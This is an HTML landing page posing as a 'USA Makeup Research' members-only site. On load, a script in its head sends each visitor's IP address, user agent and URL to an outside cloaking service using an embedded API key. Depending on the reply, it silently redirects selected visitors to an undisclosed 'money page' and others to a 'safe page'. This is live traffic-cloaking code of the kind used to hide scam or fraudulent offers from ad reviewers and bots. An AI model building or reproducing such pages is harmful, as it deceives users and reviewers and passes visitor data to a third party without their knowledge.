<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>USA Makeup Research Program</title>
    <link rel="stylesheet" href="backgroundAnim.css">
    <link rel="icon" type="image/x-icon" href="favicon.ico">

    <script>
var key = "";
var ip = "";
var campaign = "";
var user_agent = "";
var strictness = 0;
var failure_redirect = "";
var success_redirect = "";
var current_url = window.location.href;
function executeCheck(){

  var http = new XMLHttpRequest();
  var url = "https://app.cloakerly.com/v2/integration/check/"+key+"/"+ip+"/"+campaign;
  var params = "user_agent="+user_agent+"&strictness="+strictness+"&current_url="+current_url;
  http.open("POST", url, true);

  http.setRequestHeader("Content-type", "application/x-www-form-urlencoded");

  http.onreadystatechange = function() {
      if(http.readyState == 4 && http.status == 200) {
          checkResponse(http.responseText);
      }
  }
  http.send(params);
}

function getIP(key){
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
  if (this.readyState == 4 && this.status == 200) {
    var data = JSON.parse(this.responseText);
    ip = data.ip;
    user_agent = data.user_agent;
    executeCheck(key,ip,campaign);
  }
  };
  xhttp.open("GET", "https://app.cloakerly.com/v2/integration/getIp", true);
  xhttp.send();
}

function checkResponse(res){
  response = JSON.parse(res);
  success_redirect = response.money_page;
  failure_redirect = response.safe_page;

  if(response.proxy_bot == true){
  }else if(response.status === false){
    if(failure_redirect!=""){
      if(window.location.href.indexOf(failure_redirect) > -1) {
      }else{
        if(response.fr == 1){
          window.location.href = failure_redirect;
        }
      }
    }
  }else{
    if(success_redirect!=""){
      window.location.href = success_redirect;
    }
  }
}

function PreventLoad(){
    key = "3cntTQKbzIa8vkLXHrciCjxHPB0lDF9v4761xh23mGt6fesOBLEkESJDqqmMF1w5";
    campaign = "20703";
    strictness = "0";
    getIP(key);
}
PreventLoad();
</script>
</head>

<style>/* FontsFree-Net-Proxima-Nova-Thin.woff load */
    @font-face {
        font-family: 'Proxima Thin';
        src: url('proxima_nova_alt_thin-webfont.woff') format('woff');
        font-weight: 500;
        font-style: normal;
        font-family: 'Proxima Thin';
        font-display: auto;

    }
    .accessibleHidden {
        opacity: 0.001;
        position: absolute;
        width: 1px;
        height: 1px;
        overflow: hidden;
    }
    body {
        padding: 0;
        margin: 0;
        background: #0A2145 !important;
        display: flex;
        display:flex;
        align-items: center;
        justify-content: center;
        width: 100vw;
        min-height: 100vh;
        box-sizing: border-box;
        font-family: -apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;
        font-size: 1rem;
        font-weight: 400;
        line-height: 1.5;
        color: #333;
        background-color: #fff;
        -webkit-font-smoothing: antialiased;
    }
    .container {
        max-width: 1140px;
        display:flex;
        align-items: center;
        justify-content: center;
        flex-direction: column;
    }
    p {
        color: #CCCCCC;
        font-family: "Proxima Thin", Sans-serif;
        font-size: 18px;
        font-weight: 500;
        margin:0;
        opacity: 0;
        animation: fadeInUp .75s ease-in forwards;
    }
    .main-logo{
        display: block;
        width: 59%;
        height: auto;
        margin-bottom: 30px;
        animation: fadeInUp .75s ease-in forwards;
        animation-delay: 0ms;
        
    }
    .domain{
        animation-delay: 1000ms;
    }
    .email{
        margin: 20px 0px 0px 0px;
        animation-delay: 2000ms;
        text-align: center;
        color: #CCCCCC;
        font-family: "Proxima Thin", Sans-serif;
        font-size: 18px;
        font-weight: 500;
        letter-spacing: 1px;
    }
    @media (max-width: 767px){
        .main-logo{
            width: 201px;
        }
        .email {
            font-size: 14px;
        }
    }

    @keyframes fadeIn {
        from {
            opacity: 0;
            transform: translateY(100px);
        }
        60% {
            opacity: 1;
        }
        to {
            opacity: 1;
            transform: translateY(0px);
        }
    }
    @keyframes fadeInUp{from{opacity:0;transform:translate3d(0,100%,0)}to{opacity:1;transform:none}}



</style>

<body >
    <div class="background"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span>
    </div>
    <div class="container">
        <h1 class="accessibleHidden">USAMakeup</h1>

        <p class="domain">Welcome to USA Makeup Research.</p>
        <p class="email">Exclusive for members only.</p>
    </div>
</body>
</html>
